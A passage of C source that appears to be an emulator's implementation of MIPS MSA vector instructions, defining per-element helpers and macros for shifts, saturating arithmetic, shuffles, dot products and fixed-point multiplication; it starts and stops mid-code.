&(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_sll_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_sll_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_sra_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return arg1 >> b_arg2; } void helper_msa_sra_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_sra_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_sra_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_sra_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_sra_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_sra_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_sra_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_sra_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_sra_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_sra_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_sra_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_sra_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_sra_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_sra_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_sra_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_sra_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_sra_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_sra_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_sra_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_sra_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_sra_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_sra_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_sra_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_sra_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_sra_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_sra_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_sra_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_sra_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_sra_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_sra_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_sra_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_sra_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_sra_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_sra_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srar_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); if (b_arg2 == 0) { return arg1; } else { int64_t r_bit = (arg1 >> (b_arg2 - 1)) & 1; return (arg1 >> b_arg2) + r_bit; } } void helper_msa_srar_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_srar_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srar_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srar_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srar_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srar_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srar_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srar_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srar_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srar_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srar_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srar_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srar_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srar_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srar_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srar_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srar_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srar_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_srar_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srar_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srar_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srar_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srar_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srar_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srar_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srar_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srar_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srar_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srar_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srar_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_srar_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srar_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srar_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srar_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srl_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); int32_t b_arg2 = BIT_POSITION(arg2, df); return u_arg1 >> b_arg2; } void helper_msa_srl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_srl_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srl_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srl_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srl_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srl_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srl_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srl_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srl_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srl_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srl_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srl_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srl_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srl_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srl_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srl_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srl_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_srl_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srl_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srl_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srl_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srl_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srl_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srl_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srl_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srl_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srl_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srl_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_srl_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srl_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srl_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_srlr_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); int32_t b_arg2 = BIT_POSITION(arg2, df); if (b_arg2 == 0) { return u_arg1; } else { uint64_t r_bit = (u_arg1 >> (b_arg2 - 1)) & 1; return (u_arg1 >> b_arg2) + r_bit; } } void helper_msa_srlr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_srlr_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srlr_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srlr_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srlr_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srlr_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srlr_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srlr_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srlr_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srlr_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srlr_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srlr_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srlr_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srlr_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srlr_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srlr_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srlr_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srlr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_srlr_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srlr_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srlr_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srlr_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srlr_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srlr_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srlr_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srlr_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srlr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srlr_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srlr_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srlr_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_srlr_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srlr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srlr_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srlr_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } #define MSA_FN_IMM8(FUNC, DEST, OPERATION) \ void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ uint32_t i8) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ DEST = OPERATION; \ } \ } MSA_FN_IMM8(andi_b, pwd->b[i], pws->b[i] & i8) MSA_FN_IMM8(ori_b, pwd->b[i], pws->b[i] | i8) MSA_FN_IMM8(nori_b, pwd->b[i], ~(pws->b[i] | i8)) MSA_FN_IMM8(xori_b, pwd->b[i], pws->b[i] ^ i8) #define BIT_MOVE_IF_NOT_ZERO(dest, arg1, arg2, df) \ UNSIGNED(((dest & (~arg2)) | (arg1 & arg2)), df) MSA_FN_IMM8(bmnzi_b, pwd->b[i], BIT_MOVE_IF_NOT_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) #define BIT_MOVE_IF_ZERO(dest, arg1, arg2, df) \ UNSIGNED((dest & arg2) | (arg1 & (~arg2)), df) MSA_FN_IMM8(bmzi_b, pwd->b[i], BIT_MOVE_IF_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) #define BIT_SELECT(dest, arg1, arg2, df) \ UNSIGNED((arg1 & (~dest)) | (arg2 & dest), df) MSA_FN_IMM8(bseli_b, pwd->b[i], BIT_SELECT(pwd->b[i], pws->b[i], i8, DF_BYTE)) #undef BIT_SELECT #undef BIT_MOVE_IF_ZERO #undef BIT_MOVE_IF_NOT_ZERO #undef MSA_FN_IMM8 #define SHF_POS(i, imm) (((i) & 0xfc) + (((imm) >> (2 * ((i) & 0x03))) & 0x03)) void helper_msa_shf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t imm) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t wx, *pwx = &wx; uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwx->b[i] = pws->b[SHF_POS(i, imm)]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwx->h[i] = pws->h[SHF_POS(i, imm)]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwx->w[i] = pws->w[SHF_POS(i, imm)]; } break; default: assert(0); } msa_move_v(pwd, pwx); } static inline int64_t msa_subv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 - arg2; } #define MSA_BINOP_IMM_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, int32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_IMM_DF(addvi, addv) MSA_BINOP_IMM_DF(subvi, subv) MSA_BINOP_IMM_DF(ceqi, ceq) MSA_BINOP_IMM_DF(clei_s, cle_s) MSA_BINOP_IMM_DF(clei_u, cle_u) MSA_BINOP_IMM_DF(clti_s, clt_s) MSA_BINOP_IMM_DF(clti_u, clt_u) MSA_BINOP_IMM_DF(maxi_s, max_s) MSA_BINOP_IMM_DF(maxi_u, max_u) MSA_BINOP_IMM_DF(mini_s, min_s) MSA_BINOP_IMM_DF(mini_u, min_u) #undef MSA_BINOP_IMM_DF void helper_msa_ldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, int32_t s10) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = (int8_t)s10; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = (int16_t)s10; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = (int32_t)s10; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = (int64_t)s10; } break; default: assert(0); } } static inline int64_t msa_sat_s_df(uint32_t df, int64_t arg, uint32_t m) { return arg < M_MIN_INT(m + 1) ? M_MIN_INT(m + 1) : arg > M_MAX_INT(m + 1) ? M_MAX_INT(m + 1) : arg; } static inline int64_t msa_sat_u_df(uint32_t df, int64_t arg, uint32_t m) { uint64_t u_arg = UNSIGNED(arg, df); return u_arg < M_MAX_UINT(m + 1) ? u_arg : M_MAX_UINT(m + 1); } #define MSA_BINOP_IMMU_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_IMMU_DF(slli, sll) MSA_BINOP_IMMU_DF(srai, sra) MSA_BINOP_IMMU_DF(srli, srl) MSA_BINOP_IMMU_DF(bclri, bclr) MSA_BINOP_IMMU_DF(bseti, bset) MSA_BINOP_IMMU_DF(bnegi, bneg) MSA_BINOP_IMMU_DF(sat_s, sat_s) MSA_BINOP_IMMU_DF(sat_u, sat_u) MSA_BINOP_IMMU_DF(srari, srar) MSA_BINOP_IMMU_DF(srlri, srlr) #undef MSA_BINOP_IMMU_DF #define MSA_TEROP_IMMU_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, uint32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_TEROP_IMMU_DF(binsli, binsl) MSA_TEROP_IMMU_DF(binsri, binsr) #undef MSA_TEROP_IMMU_DF static inline int64_t msa_subs_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (arg2 > 0) { return (min_int + arg2 < arg1) ? arg1 - arg2 : min_int; } else { return (arg1 < max_int + arg2) ? arg1 - arg2 : max_int; } } static inline int64_t msa_subs_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return (u_arg1 > u_arg2) ? u_arg1 - u_arg2 : 0; } static inline int64_t msa_subsus_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t max_uint = DF_MAX_UINT(df); if (arg2 >= 0) { uint64_t u_arg2 = (uint64_t)arg2; return (u_arg1 > u_arg2) ? (int64_t)(u_arg1 - u_arg2) : 0; } else { uint64_t u_arg2 = (uint64_t)(-arg2); return (u_arg1 < max_uint - u_arg2) ? (int64_t)(u_arg1 + u_arg2) : (int64_t)max_uint; } } static inline int64_t msa_subsuu_s_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (u_arg1 > u_arg2) { return u_arg1 - u_arg2 < (uint64_t)max_int ? (int64_t)(u_arg1 - u_arg2) : max_int; } else { return u_arg2 - u_arg1 < (uint64_t)(-min_int) ? (int64_t)(u_arg1 - u_arg2) : min_int; } } static inline int64_t msa_mulv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 * arg2; } #define SIGNED_EXTRACT(e, o, a, df) \ do { \ e = SIGNED_EVEN(a, df); \ o = SIGNED_ODD(a, df); \ } while (0) #define UNSIGNED_EXTRACT(e, o, a, df) \ do { \ e = UNSIGNED_EVEN(a, df); \ o = UNSIGNED_ODD(a, df); \ } while (0) static inline int64_t msa_dotp_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dotp_u_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } #define CONCATENATE_AND_SLIDE(s, k) \ do { \ for (i = 0; i < s; i++) { \ v[i] = pws->b[s * k + i]; \ v[i + s] = pwd->b[s * k + i]; \ } \ for (i = 0; i < s; i++) { \ pwd->b[s * k + i] = v[i + n]; \ } \ } while (0) static inline void msa_sld_df(uint32_t df, wr_t *pwd, wr_t *pws, target_ulong rt) { uint32_t n = rt % DF_ELEMENTS(df); uint8_t v[64]; uint32_t i, k; switch (df) { case DF_BYTE: CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_BYTE), 0); break; case DF_HALF: for (k = 0; k < 2; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_HALF), k); } break; case DF_WORD: for (k = 0; k < 4; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_WORD), k); } break; case DF_DOUBLE: for (k = 0; k < 8; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_DOUBLE), k); } break; default: assert(0); } } static inline int64_t msa_mul_q_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t q_min = DF_MIN_INT(df); int64_t q_max = DF_MAX_INT(df); if (arg1 == q_min && arg2 == q_min) { return q_max; } return (arg1 * arg2) >> (DF_BITS(df) - 1); } static inline int64_t msa_mulr_q_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t q_min = DF_MIN_INT(df); int64_t q_max = DF_MAX_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); if (arg1 == q_min && arg2 == q_min) { return q_max; } return (arg1 * arg2 + r_bit) >> (DF_BITS(df) - 1); } #define MSA_BINOP_DF(func) \ void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ \ switch (df) { \ case DF_BYTE: \ pwd->b[0] = msa_ ## func ## _df(df, pws->b[0], pwt->b[0]); \ pwd->b[1] = msa_ ## func ## _df(df, pws->b[1], pwt->b[1]); \ pwd->b[2] = msa_ ## func ## _df(df, pws->b[2], pwt->b[2]); \ pwd->b[3] = msa_ ## func ## _df(df, pws->b[3], pwt->b[3]); \ pwd->b[4] = msa_ ## func ## _df(df, pws->b[4], pwt->b[4]); \ pwd->b[5] = msa_ ## func ## _df(df, pws->b[5], pwt->b[5]); \ pwd->b[6] = msa_ ## func ## _df(df, pws->b[6], pwt->b[6]); \ pwd->b[7] = msa_ ## func ## _df(df, pws->b[7], pwt->b[7]); \ pwd->b[8] = msa_ ## func ## _df(df, pws->b[8], pwt->b[8]); \ pwd->b[9] = msa_ ## func ## _df(df, pws->b[9], pwt->b[9]); \ pwd->b[10] = msa_ ## func ## _df(df, pws->b[10], pwt->b[10]); \ pwd->b[11] = msa_ ## func ## _df(df, pws->b[11], pwt->b[11]); \ pwd->b[12] = msa_ ## func ## _df(df, pws->b[12], pwt->b[12]); \ pwd->b[13] = msa_ ## func ## _df(df, pws->b[13], pwt->b[13]); \ pwd->b[14] = msa_ ## func ## _df(df, pws->b[14], pwt->b[14]); \ pwd->b[15] = msa_ ## func ## _df(df, pws->b[15], pwt->b[15]); \ break; \ case DF_HALF: \ pwd->h[0] = msa_ ## func ## _df(df, pws->h[0], pwt->h[0]); \ pwd->h[1] = msa_ ## func ## _df(df, pws->h[1], pwt->h[1]); \ pwd->h[2] = msa_ ## func ## _df(df, 